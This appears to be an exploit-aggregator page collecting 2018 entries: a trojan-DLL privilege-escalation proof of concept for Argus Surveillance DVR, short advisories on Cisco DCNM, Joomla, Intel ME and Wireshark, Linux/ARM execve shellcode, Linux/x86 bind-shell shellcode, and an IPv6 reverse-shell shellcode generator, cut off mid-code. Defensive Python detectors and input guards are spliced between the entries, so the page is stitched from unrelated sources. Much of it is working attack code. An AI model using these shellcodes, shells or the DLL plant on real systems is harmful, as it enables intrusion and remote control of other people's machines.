Channel: Exploit Collector

Argus Surveillance DVR 4.0.0.0 Privilege Escalation


Argus Surveillance DVR version 4.0.0.0 suffers from a privilege escalation vulnerability.


MD5 | 568a5ca14ccf6b72d34900efe6809bce

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec


Greetz: indoushka | Eduardo | GGA


[Vendor]
www.argussurveillance.com



[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site.
When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video.
This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.


[Vulnerability Type]
SYSTEM Privilege Escalation



[CVE Reference]
N/A


[Security Issue]
Argus Surveillance DVR 4.0.0.0 allows trojan-file SYSTEM privilege escalation.
Placing a trojan DLL named "gsm_codec.dll" in the Argus application directory leads to arbitrary code execution with SYSTEM integrity, because the watchdog service loads that DLL by name from its own directory.


[Affected Component]
DVRWatchdog.exe


[Exploit/POC]
Create a 32-bit DLL named "gsm_codec.dll", place it in the application directory, and launch Argus DVR: tada! You're now SYSTEM.

#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 gsm_codec.c
gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
*/

/* Visible proof that the planted DLL was loaded inside the SYSTEM-level process. */
void systemo(void){
    MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
}

/* The loader calls DllMain on every process/thread attach and detach notification. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            systemo();
            break;
    }

    return TRUE;
}
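The defensive counterpart to the advisory above is to notice when a SYSTEM-level service picks up an unsigned DLL from its own (user-writable) application directory rather than from a system directory. The following is an added example, not part of the advisory: a small detection rule run over records that mimic a subset of Sysmon Event ID 7 (ImageLoad) fields. The install path, the DVRCore.dll name and all other sample values are constructed for this example.

```python
"""Flag the DLL-planting pattern from the advisory: a SYSTEM process loading an
unsigned DLL from outside the Windows system directories, with the highest
severity when the DLL sits in the process's own application directory.
Records use Sysmon Event ID 7 field names (Image, ImageLoaded, Signed,
SignatureStatus, User); every value in SAMPLE_EVENTS is constructed."""
import ntpath

# Locations a service is expected to load Windows DLLs from.
TRUSTED_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS")


def _is_under(path, directory):
    """Case-insensitive 'path lies inside directory' test using Windows path rules."""
    p = ntpath.normcase(ntpath.normpath(path))
    d = ntpath.normcase(ntpath.normpath(directory))
    return p == d or p.startswith(d + "\\")


def classify_image_load(event):
    """Return 'high', 'medium' or None for one ImageLoad record.

    high   - unsigned DLL loaded by a SYSTEM process from that process's own
             directory (what a planted gsm_codec.dll next to DVRWatchdog.exe looks like)
    medium - unsigned DLL loaded by a SYSTEM process from any other non-system directory
    None   - not a SYSTEM process, a system directory, or a validly signed DLL
    """
    if event.get("User", "").upper() != r"NT AUTHORITY\SYSTEM":
        return None
    loaded = event.get("ImageLoaded", "")
    if any(_is_under(loaded, d) for d in TRUSTED_DIRS):
        return None
    signed_ok = (str(event.get("Signed", "")).lower() == "true"
                 and event.get("SignatureStatus") == "Valid")
    if signed_ok:
        return None
    app_dir = ntpath.dirname(event.get("Image", ""))
    return "high" if app_dir and _is_under(loaded, app_dir) else "medium"


def scan(events):
    """Return (severity, process image, loaded DLL) for every record that fires."""
    hits = []
    for event in events:
        severity = classify_image_load(event)
        if severity:
            hits.append((severity, event["Image"], event["ImageLoaded"]))
    return hits


# Constructed sample records; the Argus install path is assumed, not taken from the advisory.
APP = r"C:\Program Files (x86)\Argus Surveillance DVR"
SAMPLE_EVENTS = [
    {"Image": APP + r"\DVRWatchdog.exe", "ImageLoaded": APP + r"\gsm_codec.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": APP + r"\DVRWatchdog.exe", "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": APP + r"\DVRWatchdog.exe", "ImageLoaded": APP + r"\DVRCore.dll",
     "Signed": "true", "SignatureStatus": "Valid", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ImageLoaded": r"C:\Temp\helper.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ImageLoaded": r"C:\Users\alice\plugin.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "User": r"CORP\alice"},
]

if __name__ == "__main__":
    for severity, process, dll in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {process} loaded {dll}")
```

The rule deliberately stays quiet for signed, validly catalogued DLLs in the application directory (the third record), since legitimate products ship their own libraries there; the signal is the combination of SYSTEM context, a non-system location and a missing or invalid signature. The last record is outside the rule's scope because the loading process is not SYSTEM. The mitigation the rule points at is the ACL on the application directory: if unprivileged users cannot write there, the planted-DLL case cannot arise.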



[Video POC URL]
https://vimeo.com/287115698



[Network Access]
Local


[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
Public Disclosure: August 28, 2018



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


Cisco Data Center Network Manager CVE-2018-0464 Directory Traversal Vulnerability



Cisco Data Center Network Manager is prone to a directory-traversal vulnerability.

A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information.

This issue is being tracked by Cisco Bug ID CSCvj86072.

Information

Bugtraq ID: 105159
Class: Input Validation Error
CVE: CVE-2018-0464

Remote: Yes
Local: No
Published: Aug 28 2018 12:00AM
Updated: Aug 28 2018 12:00AM
Credit: Tenable, Inc.
Vulnerable: Cisco Prime Data Center Network Manager (DCNM) 7.1(1)
Cisco Prime Data Center Network Manager (DCNM) 7.0(2)
Cisco Prime Data Center Network Manager (DCNM) 7.0(1)
Cisco Prime Data Center Network Manager (DCNM) 6.3(2)
Cisco Prime Data Center Network Manager (DCNM) 6.3(1)
Cisco Prime Data Center Network Manager (DCNM) 10.3(1)
Cisco Prime Data Center Network Manager (DCNM) 10.2
Cisco Prime Data Center Network Manager (DCNM) 10.1
Cisco Prime Data Center Network Manager (DCNM) 10.0


Not Vulnerable: Cisco Data Center Network Manager (DCNM) 11.0(1)


Exploit


An attacker can exploit this issue using a web browser.
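The generic server-side guard against the '../' traversal class described above, as an added example (not Cisco's DCNM fix, which the advisory does not detail): decode the request path once, reject NUL bytes and absolute paths, resolve the result, and only then check that it still lies under the base directory. The base directory and the request paths are constructed for this example.

```python
"""Path-traversal guard for a file-serving endpoint.  safe_join() returns the
resolved target path or None; serve_file() shows where the check sits in a
handler.  BASE_DIR and SAMPLE_REQUESTS are constructed sample values."""
import os
from urllib.parse import unquote


def safe_join(base_dir, user_path):
    """Return the real path of user_path inside base_dir, or None if the
    request would resolve outside base_dir (including through symlinks)."""
    # One round of percent-decoding so %2e%2e%2f is judged as "../".
    decoded = unquote(user_path)
    # Embedded NULs truncate paths in C-level file APIs; never pass them on.
    if "\x00" in decoded:
        return None
    # An absolute request would replace base_dir entirely inside os.path.join.
    if os.path.isabs(decoded) or decoded.startswith(("/", "\\")):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:  # different drives on Windows
        inside = False
    return target if inside else None


def serve_file(base_dir, user_path):
    """What a download handler should do: refuse before touching the filesystem."""
    target = safe_join(base_dir, user_path)
    if target is None:
        return 403, None
    return 200, target


BASE_DIR = "/srv/dcnm/files"  # constructed base directory
SAMPLE_REQUESTS = [           # constructed request paths
    "reports/summary.txt",
    "reports/../summary.txt",
    "../../etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
    "..%2f..%2fetc%2fpasswd",
    "/etc/passwd",
    "reports/summary.txt%00.jpg",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        status, path = serve_file(BASE_DIR, request)
        print(f"{status} {request!r} -> {path}")
```

Note that "reports/../summary.txt" is accepted: traversal that stays inside the base directory is harmless, and rejecting the literal string ".." instead of checking the resolved path is the usual way these filters get bypassed (through encoding variants, as the percent-encoded samples show). Using realpath rather than normpath also catches a symlink inside the base directory that points outside it.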


    Joomla! CVE-2018-15880 HTML Injection Vulnerability



    Joomla! is prone to an HTML-injection vulnerability because it fails to sanitize user-supplied input.
    Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
    Joomla! 1.5.0 through 3.8.11 are vulnerable.

    Information

    Bugtraq ID: 105164
    Class: Input Validation Error
    CVE: CVE-2018-15880

    Remote: Yes
    Local: No
    Published: Aug 28 2018 12:00AM
    Updated: Aug 28 2018 12:00AM
    Credit: Roland Dalmulder
    Vulnerable: Joomla Joomla! 3.8.11
    Joomla Joomla! 3.8.10
    Joomla Joomla! 3.8.9
    Joomla Joomla! 3.8.8
    Joomla Joomla! 3.8.7
    Joomla Joomla! 3.8.6
    Joomla Joomla! 3.8.5
    Joomla Joomla! 3.8.4
    Joomla Joomla! 3.8.3
    Joomla Joomla! 3.8.2
    Joomla Joomla! 3.8.1
    Joomla Joomla! 3.7.3
    Joomla Joomla! 3.7.2
    Joomla Joomla! 3.7.1
    Joomla Joomla! 3.7
    Joomla Joomla! 3.6.5
    Joomla Joomla! 3.5
    Joomla Joomla! 3.4.7
    Joomla Joomla! 3.4.6
    Joomla Joomla! 3.4.4
    Joomla Joomla! 3.4.3
    Joomla Joomla! 3.4.2
    Joomla Joomla! 3.4.1
    Joomla Joomla! 3.4
    Joomla Joomla! 3.3.6
    Joomla Joomla! 3.3.5
    Joomla Joomla! 3.3.4
    Joomla Joomla! 3.3.3
    Joomla Joomla! 3.3.2
    Joomla Joomla! 3.3.1
    Joomla Joomla! 3.3
    Joomla Joomla! 3.2.6
    Joomla Joomla! 3.2.5
    Joomla Joomla! 3.2.4
    Joomla Joomla! 3.2.3
    Joomla Joomla! 3.2.2
    Joomla Joomla! 3.2.1
    Joomla Joomla! 3.1.6
    Joomla Joomla! 3.1.5
    Joomla Joomla! 3.1.4
    Joomla Joomla! 3.1.1
    Joomla Joomla! 3.1
    Joomla Joomla! 3.0.4
    Joomla Joomla! 3.0.3
    Joomla Joomla! 3.0.1
    Joomla Joomla! 3.0
    Joomla Joomla! 2.5.26
    Joomla Joomla! 2.5.25
    Joomla Joomla! 2.5.24
    Joomla Joomla! 2.5.19
    Joomla Joomla! 2.5.18
    Joomla Joomla! 2.5.17
    Joomla Joomla! 2.5.16
    Joomla Joomla! 2.5.15
    Joomla Joomla! 2.5.14
    Joomla Joomla! 2.5.13
    Joomla Joomla! 2.5.11
    Joomla Joomla! 2.5.10
    Joomla Joomla! 2.5.9
    Joomla Joomla! 2.5.8
    Joomla Joomla! 2.5.7
    Joomla Joomla! 2.5.6
    Joomla Joomla! 2.5.5
    Joomla Joomla! 2.5.4
    Joomla Joomla! 2.5.3
    Joomla Joomla! 2.5.2
    Joomla Joomla! 2.5.1
    Joomla Joomla! 2.5
    Joomla Joomla! 1.7.5
    Joomla Joomla! 1.7.4
    Joomla Joomla! 1.7.3
    Joomla Joomla! 1.7.2
    Joomla Joomla! 1.7.1
    Joomla Joomla! 1.7
    Joomla Joomla! 1.6.6
    Joomla Joomla! 1.6.4
    Joomla Joomla! 1.6.3
    Joomla Joomla! 1.6.2
    Joomla Joomla! 1.6.1
    Joomla Joomla! 1.6
    Joomla Joomla! 1.5.26
    Joomla Joomla! 1.5.22
    Joomla Joomla! 1.5.21
    Joomla Joomla! 1.5.20
    Joomla Joomla! 1.5.19
    Joomla Joomla! 1.5.18
    Joomla Joomla! 1.5.17
    Joomla Joomla! 1.5.16
    Joomla Joomla! 1.5.15
    Joomla Joomla! 1.5.14
    Joomla Joomla! 1.5.13
    Joomla Joomla! 1.5.12
    Joomla Joomla! 1.5.11
    Joomla Joomla! 1.5.10
    Joomla Joomla! 1.5.9
    Joomla Joomla! 1.5.8
    Joomla Joomla! 1.5.7
    Joomla Joomla! 1.5.6
    Joomla Joomla! 1.5.5
    Joomla Joomla! 1.5.4
    Joomla Joomla! 1.5.2
    Joomla Joomla! 3.8.0
    Joomla Joomla! 3.7.5
    Joomla Joomla! 3.7.4
    Joomla Joomla! 3.6.4
    Joomla Joomla! 3.6.3
    Joomla Joomla! 3.6.1
    Joomla Joomla! 3.6.0
    Joomla Joomla! 3.4.5
    Joomla Joomla! 3.2
    Joomla Joomla! 2.5
    Joomla Joomla! 1.7
    Joomla Joomla! 1.6.5
    Joomla Joomla! 1.5.3
    Joomla Joomla! 1.5.23
    Joomla Joomla! 1.5.1
    Joomla Joomla! 1.5.0


    Not Vulnerable: Joomla Joomla! 3.8.12


    Exploit


    An attacker can exploit the issue by enticing an unsuspecting user to visit a specially crafted URL.
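HTML injection of the kind described above is stopped at output time by encoding each untrusted value for the exact HTML context it lands in (text node versus quoted attribute) and by restricting link targets to an allow-list of schemes. The following is an added example of that generic mitigation beside the unencoded pattern it replaces; it is not Joomla's own fix, and the page fragment and sample inputs are constructed.

```python
"""Context-aware output encoding for a reflected search-results fragment.
render_vulnerable() is the raw-concatenation pattern behind HTML injection;
render_result() is the hardened form.  SAMPLE holds constructed inputs."""
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "mailto"}


def safe_href(url):
    """Return an attribute-safe href; active or unknown schemes collapse to '#'."""
    # Browsers ignore tabs and newlines inside a scheme, so remove them before parsing.
    cleaned = "".join(ch for ch in url.strip() if ch not in "\t\r\n")
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return "#"
    return html.escape(cleaned, quote=True)


def render_result(title, link, snippet):
    """Render one hit with every untrusted value encoded for its context."""
    return (
        '<li><a href="{href}" title="{title_attr}">{title}</a>: {snippet}</li>'
    ).format(
        href=safe_href(link),
        title_attr=html.escape(title, quote=True),  # attribute context: quotes matter
        title=html.escape(title),                   # text context
        snippet=html.escape(snippet),
    )


def render_vulnerable(title, link, snippet):
    """The pattern the advisory class describes: no encoding at all."""
    return f'<li><a href="{link}" title="{title}">{title}</a>: {snippet}</li>'


# Constructed inputs of the kind a crafted URL would reflect into the page.
SAMPLE = {
    "title": "<script>alert(1)</script>",
    "link": "javascript:alert(1)",
    "snippet": 'x" onmouseover="alert(2)',
}

if __name__ == "__main__":
    print(render_vulnerable(**SAMPLE))
    print(render_result(**SAMPLE))
```

The attribute and text contexts need different treatment: `quote=True` is what keeps the snippet's `"` from closing the attribute early, and the scheme check is what keeps a `javascript:` target from being rendered unchanged, since escaping alone leaves that URL intact.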


      Intel Management Engine JTAG Buffer Overflow


      Proof of concept exploit that demonstrates a buffer overflow vulnerability in the Intel Management Engine as described in INTEL-SA-00086.


      MD5 | 2f77faadeb0a2c90ab38401dea8d9030


      Wireshark Multiple Denial of Service Vulnerabilities



      Wireshark is prone to multiple denial-of-service vulnerabilities.

      An attacker can exploit these issues by injecting a malformed packet onto the wire or by convincing someone to read a malformed 'pcap' file.

      Attackers can exploit these issues to crash the affected application or to consume excess memory, denying service to legitimate users.

      Wireshark 2.6.0 through 2.6.2, 2.4.0 through 2.4.8, and 2.2.0 through 2.2.16 are vulnerable.

      Information

      Bugtraq ID: 105174
      Class: Failure to Handle Exceptional Conditions
      CVE: CVE-2018-16058
      CVE-2018-16056
      CVE-2018-16057

      Remote: Yes
      Local: No
      Published: Aug 29 2018 12:00AM
      Updated: Aug 29 2018 12:00AM
      Credit: The vendor reported these issues.
      Vulnerable: Wireshark Wireshark 2.6.2
      Wireshark Wireshark 2.6.1
      Wireshark Wireshark 2.6
      Wireshark Wireshark 2.4.8
      Wireshark Wireshark 2.4.7
      Wireshark Wireshark 2.4.6
      Wireshark Wireshark 2.4.5
      Wireshark Wireshark 2.4.4
      Wireshark Wireshark 2.4.3
      Wireshark Wireshark 2.4.1
      Wireshark Wireshark 2.4
      Wireshark Wireshark 2.2.16
      Wireshark Wireshark 2.2.15
      Wireshark Wireshark 2.2.14
      Wireshark Wireshark 2.2.13
      Wireshark Wireshark 2.2.12
      Wireshark Wireshark 2.2.11
      Wireshark Wireshark 2.2.10
      Wireshark Wireshark 2.2.9
      Wireshark Wireshark 2.2.8
      Wireshark Wireshark 2.2.7
      Wireshark Wireshark 2.2.6
      Wireshark Wireshark 2.2.5
      Wireshark Wireshark 2.2.4
      Wireshark Wireshark 2.2.3
      Wireshark Wireshark 2.2.2
      Wireshark Wireshark 2.2.1
      Wireshark Wireshark 2.2
      Wireshark Wireshark 2.4.2


      Not Vulnerable: Wireshark Wireshark 2.6.3
      Wireshark Wireshark 2.4.9
      Wireshark Wireshark 2.2.17


      Exploit


      Sample packet trace files are available in the Wireshark bug reports. Please see the references for more information.


        Linux/ARM execve("/bin/sh", ["/bin/sh"], NULL) Shellcode


        32 bytes small Linux/ARM execve("/bin/sh", ["/bin/sh"], NULL) shellcode.


        MD5 | bcac05f65d3e93f7f75cd126357c62cb

        /*
        Title: Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)
        Date: 2018-08-16
        Tested: armv7l (Raspberry Pi 3 Model B+)
        Author: Ken Kitahara

        pi@raspberrypi:~ $ uname -a
        Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
        pi@raspberrypi:~ $ lsb_release -a
        No LSB modules are available.
        Distributor ID: Raspbian
        Description: Raspbian GNU/Linux 9.4 (stretch)
        Release: 9.4
        Codename: stretch
        pi@raspberrypi:~ $ cat binsh.s
        .section .text
        .global _start

        _start:
        .ARM
        add r3, pc, #1
        bx r3

        .THUMB
        // execve("/bin/sh", ["/bin/sh"], NULL)
        adr r0, spawn
        eor r2, r2, r2
        strb r2, [r0, #7]
        push {r0, r2}
        mov r1, sp
        mov r7, #11
        svc #1

        // adjust address
        eor r7, r7, r7

        spawn:
        .ascii "/bin/shA"

        pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
        pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
        pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x"""' binsh.bin
        \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41

        */

        #include<stdio.h>
        #include<string.h>

        unsigned char sc[] = \
        "\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
        "\x03\xa0\x52\x40\xc2\x71\x05\xb4"
        "\x69\x46\x0b\x27\x01\xdf\x7f\x40"
        "\x2f\x62\x69\x6e\x2f\x73\x68\x41";

        int main(void)
        {
            printf("Shellcode Length: %zu\n", strlen((char *)sc));

            int (*ret)(void) = (int(*)(void))sc;

            ret();
            return 0;
        }


        Linux/x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode


        Linux/x86 dual network stack (IPv4 and IPv6) bind TCP shellcode.


        MD5 | 0dd1f19482e4deabce127fe130413c4a

        /*
        # Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
        # Date: 2018-08-18
        # Shellcode Author: Kevin Kirsche
        # Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell
        # Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2

        # This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh

        This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
        http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
        Student ID: SLAE-1134

        Compilation instructions:
        gcc -o shellcode shellcode.c -fno-stack-protector -z execstack

        Commented NASM:
        global _start

        section .text

        _start:
        ; socket
        ;; cleanup
        xor ebx, ebx
        ;; arguments
        push ebx ; #define IP_PROTO 0
        push 0x1 ; #define SOCK_STREAM 1
        push 0xa ; #define PF_INET6 10
        ;; function
        mov ecx, esp ; pointer to args on the stack into ecx
        push 0x66
        pop eax ; socketcall 0x66 == 102
        inc ebx ; #define SYS_SOCKET 1
        ;; call
        int 0x80
        ;; returned data
        xchg esi, eax ; sockfd eax -> esi

        ; setsocketopt
        ;; cleanup
        xor eax, eax
        ;; arguments
        push eax ; NO = 0x0
        mov edx, esp ; get a pointer to the null value
        push 0x2 ; sizeof(NO)
        push edx ; pointer to NO
        push 0x1a ; #define IPV6_V6ONLY 26
        push 0x29 ; #define IPPROTO_IPV6
        ;; function
        mov ecx, esp ; pointer to args on the stack into ecx
        mov al, 0x66 ; socketcall 0x66 == 102
        mov bl, 0xe ; #define SYS_SETSOCKOPT 14
        ;; call
        int 0x80

        ; bind ipv4
        ;; cleanup
        xor edx, edx
        ;; v4lhost struct
        push edx ; #define INADDR_ANY 0
        push word 0x3905 ; port 1337 in big endian format
        push 0x2 ; #define AF_INET 2
        ;; arguments
        mov ecx, esp ; pointer to v4lhost struct arguments
        push 0x10 ; sizeof v4lhost
        push ecx ; pointer v4lhost
        push esi ; push sockfd onto stack
        ;; function
        mov ecx, esp ; argument pointer into ecx
        mov bl, 0x2 ; #define SYS_BIND 2
        mov al, 0x66 ; socketcall 0x66 == 102
        ;; call
        int 0x80

        ; bind ipv6
        ;; cleanup
        xor eax, eax
        ;; v6lhost struct
        push dword eax ; v6_host.sin6_addr
        push dword eax
        push dword eax
        push dword eax
        push dword eax
        push word 0x3905 ; port 1337
        push word 0x0a ; PF_INET6
        ;; arguments
        mov ecx, esp ; pointer to struct into ecx
        push 0x1c ; sizeof struct
        push ecx ; pointer to struct
        push esi ; sockfd
        ;; function
        mov ecx, esp ; arguments into register
        mov bl, 0x2 ; #define SYS_BIND 2
        mov al, 0x66 ; socketcall 0x66 == 102
        ;; call
        int 0x80

        ; listen
        ;; arguments
        push byte 0x2 ; queuelimit = 2
        push esi ; sockfd
        ;; function
        mov ecx, esp ; pointer to args into ecx
        mov bl, 0x4 ; #define SYS_LISTEN 4
        mov al, 0x66 ; socketcall 0x66 == 102
        ;; call
        int 0x80

        ; accept
        ;; cleanup
        xor ebx, ebx
        ;;arguments
        push ebx ; push NULL
        push ebx ; push NULL
        push esi ; sockfd
        ;; function
        mov ecx, esp ; pointer to args into ecx
        mov bl, 0x5 ; #define SYS_ACCEPT 5
        mov al, 0x66 ; socketcall 0x66 == 102
        ;; call
        int 0x80
        ;; returned data
        xchg ebx, eax ; ebx holds the new sockfd that we accepted

        ; dup file descriptor
        ;; setup counters
        sub ecx, ecx ; zero out ecx
        mov cl, 0x2 ; create a counter
        ;; loop
        duploop:
        mov al, 0x3f ; SYS_DUP2 syscall
        int 0x80 ; call SYS_DUP2
        dec ecx ; decrement loop counter
        jns duploop ; as long as SF is not set, keep looping

        ; execve
        ;; cleanup
        xor edx, edx
        ;; command to run
        push edx ; NULL string terminator
        push 0x68732f2f ; hs//
        push 0x6e69622f ; nib/
        ;; arguments
        mov ebx, esp ; pointer to args into ebx
        push edx ; null ARGV
        push ebx ; command to run
        ;; function
        mov ecx, esp
        mov al, 0x0b ; execve systemcall
        int 0x80
        */
        #include <stdio.h>
        #include <string.h>

        unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43"
        "\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0"
        "\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10"
        "\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66"
        "\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66"
        "\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56"
        "\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49"
        "\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
        "\x53\x89\xe1\xb0\x0b\xcd\x80";


        int main(void) {
            // pollute the registers
            asm("mov $0x78975432, %eax\n\t"
                "mov $0x17645589, %ecx\n\t"
                "mov $0x23149875, %edx\n\t");

            // begin shellcode
            printf("Shellcode Length: %zu\n", strlen((char *)code));
            // execute our shellcode
            int (*ret)(void) = (int(*)(void))code;
            ret();
            return 0;
        }



        Linux/x86 IPv6 Reverse TCP Shellcode Generator


        94 bytes small Linux/x86 IPv6 reverse TCP shellcode generator.


        MD5 | 56a1d4c121dd1129c1e1128c8a0c5b07

        #!/usr/bin/env python3
        # Exploit Title: Linux x86 IPv6 Reverse TCP Shellcode Generator (94 bytes)
        # Date: 2018-08-26
        # Shellcode Author: Kevin Kirsche
        # Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_2-reverse_shell
        # Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connecting to Kali 2018.2

        # This shellcode will connect to fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509 on port 1337 and give you /bin/sh

        #This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
        #http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
        #Student ID: SLAE-1134

        from argparse import ArgumentParser
        from ipaddress import ip_address
        import sys

        sc = ("\\x31\\xdb\\x53\\x43\\x53\\x6a\\x0a\\x89\\xe1\\x6a\\x66\\x58\\xcd\\x80"
        "\\x96\\x99\\x52\\x68{ipv6_fourth_octet}\\x68{ipv6_third_octet}\\x68"
        "{ipv6_second_octet}\\x68{ipv6_first_octet}\\x52\\x66\\x68{port}"
        "\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x89\\xe1\\x43\\x43\\x6a"
        "\\x66\\x58\\xcd\\x80\\x87\\xde\\x29\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80"
        "\\x49\\x79\\xf9\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62"
        "\\x69\\x6e\\x89\\xd1\\x89\\xe3\\xb0\\x0b\\xcd\\x80")

        if __name__ == '__main__':
            parser = ArgumentParser(description=("Linux/x86 IPv6 Reverse TCP "
                                                 "Shellcode Generator"))
            parser.add_argument('ip_address', type=str, nargs='?', default='fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509',
                                help='The IP address to connect to (default fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509)')
            parser.add_argument('port', type=int, nargs='?', default=1337,
                                help='The port to connect to (default 1337)')
            args = parser.parse_args()

            ip = ip_address(args.ip_address)
            if ip.version != 6:
                print('Invalid address. This shellcode connects over IPv6 only')
                sys.exit(1)
            ip_hex = ip.exploded

            if args.port < 1 or args.port > 65535:
                print('Invalid port. Please select a port between 1 and 65535')
                sys.exit(1)

            # port as two big-endian bytes written as \x.. escapes
            port = format(args.port, '04x')
            port = "\\x{b}\\x{a}".format(
                a=port[2:4],
                b=port[0:2])

            # each "octet" below is one 32-bit chunk of the 128-bit address
            split_hex_ip = ip_hex.split(':')
            ipv6_fourth_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
                d=split_hex_ip[6][0:2],
                c=split_hex_ip[6][2:4],
                b=split_hex_ip[7][0:2],
                a=split_hex_ip[7][2:4])
            ipv6_third_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
                d=split_hex_ip[4][0:2],
                c=split_hex_ip[4][2:4],
                b=split_hex_ip[5][0:2],
                a=split_hex_ip[5][2:4])
            ipv6_second_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
                d=split_hex_ip[2][0:2],
                c=split_hex_ip[2][2:4],
                b=split_hex_ip[3][0:2],
                a=split_hex_ip[3][2:4])
            ipv6_first_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
                d=split_hex_ip[0][0:2],
                c=split_hex_ip[0][2:4],
                b=split_hex_ip[1][0:2],
                a=split_hex_ip[1][2:4])

            if '\\x00' in port:
                print('[!] Warning: The port you chose contains a null value.')
            if (('\\x00' in ipv6_fourth_octet) or ('\\x00' in ipv6_third_octet) or
                    ('\\x00' in ipv6_second_octet) or ('\\x00' in ipv6_first_octet)):
                print('[!] Warning: The IP address you chose contains a null value.')

            print('Shellcode:')
            print(sc.format(
                ipv6_first_octet=str(ipv6_first_octet),
